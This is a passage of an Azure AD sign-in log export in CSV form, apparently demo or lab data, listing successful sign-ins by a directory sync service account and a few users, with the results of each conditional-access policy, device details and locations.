+325,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:39.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,20730239-457a-49f9-b538-9a7f22b420c9,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 21:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",231a1112-0bf5-4aba-9d7a-1056d6062500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,231a1112-0bf5-4aba-9d7a-1056d6062500,SigninLogs,Sucess,36.6404686,-78.26995087
+326,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,44:02.8,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b5b1cf6c-ca8d-40b0-9bfc-a8a3cf1f024a,Microsoft.aadiam,Microsoft.aadiam,,CTFUser2,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 21:44,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 80.0.361'}",5fa972fe-7fa8-4b4b-bbdd-e60254192400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -96.76923370361328, 'latitude': 33.16151809692383}, 'state': 'Texas', 'city': 'Frisco'}",none,none,none,none,[],{'errorCode': 0},CTFUser2,d6166cfc-e0a3-43ce-bc64-761185c4082f,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,5fa972fe-7fa8-4b4b-bbdd-e60254192400,SigninLogs,Sucess,33.1615181,-96.7692337
+327,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,25:28.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,169892fb-8bed-4a71-9ded-eb0a44d35d16,Microsoft.aadiam,Microsoft.aadiam,,Jordan Ross,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 21:25,"{'operatingSystem': 'Windows 10', 'deviceId': '16377263-6c6e-4b1f-8679-1902a5731dc6', 'browser': 'Edge 81.0.416', 'displayName': 'MININT-E8D2OM5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",03ef6588-6b11-4082-af8d-742353023100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.14311981201172, 'latitude': 47.474830627441406}, 'state': 'Washington', 'city': 'Renton'}",none,none,none,none,[],{'errorCode': 0},Jordan Ross,d333c1f2-e2a3-4f8f-8370-35c29b543c62,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,03ef6588-6b11-4082-af8d-742353023100,SigninLogs,Sucess,47.47483063,-122.1431198
+328,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:34.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,862f9c5b-aab1-4b35-b70b-e621a5aaa37a,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 21:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",b3c0863d-787e-45d0-a1b5-da540b502200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b3c0863d-787e-45d0-a1b5-da540b502200,SigninLogs,Sucess,36.6404686,-78.26995087
+329,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,25:28.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,169892fb-8bed-4a71-9ded-eb0a44d35d16,Microsoft.aadiam,Microsoft.aadiam,,Jordan Ross,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 21:25,"{'operatingSystem': 'Windows 10', 'deviceId': '16377263-6c6e-4b1f-8679-1902a5731dc6', 'browser': 'Edge 81.0.416', 'displayName': 'MININT-E8D2OM5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",03ef6588-6b11-4082-af8d-742353023100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -122.14311981201172, 'latitude': 47.474830627441406}, 'state': 'Washington', 'city': 'Renton'}",none,none,none,none,[],{'errorCode': 0},Jordan Ross,d333c1f2-e2a3-4f8f-8370-35c29b543c62,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,03ef6588-6b11-4082-af8d-742353023100,SigninLogs,Sucess,47.47483063,-122.1431198
+330,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:34.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,862f9c5b-aab1-4b35-b70b-e621a5aaa37a,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 21:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",b3c0863d-787e-45d0-a1b5-da540b502200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,b3c0863d-787e-45d0-a1b5-da540b502200,SigninLogs,Sucess,36.6404686,-78.26995087
+331,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:32.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,93b2d55b-ee55-4661-a437-51ee145400cc,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 20:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",4aed1172-3ed3-4e97-ac91-018652782100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,4aed1172-3ed3-4e97-ac91-018652782100,SigninLogs,Sucess,36.6404686,-78.26995087
+332,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:32.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,93b2d55b-ee55-4661-a437-51ee145400cc,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 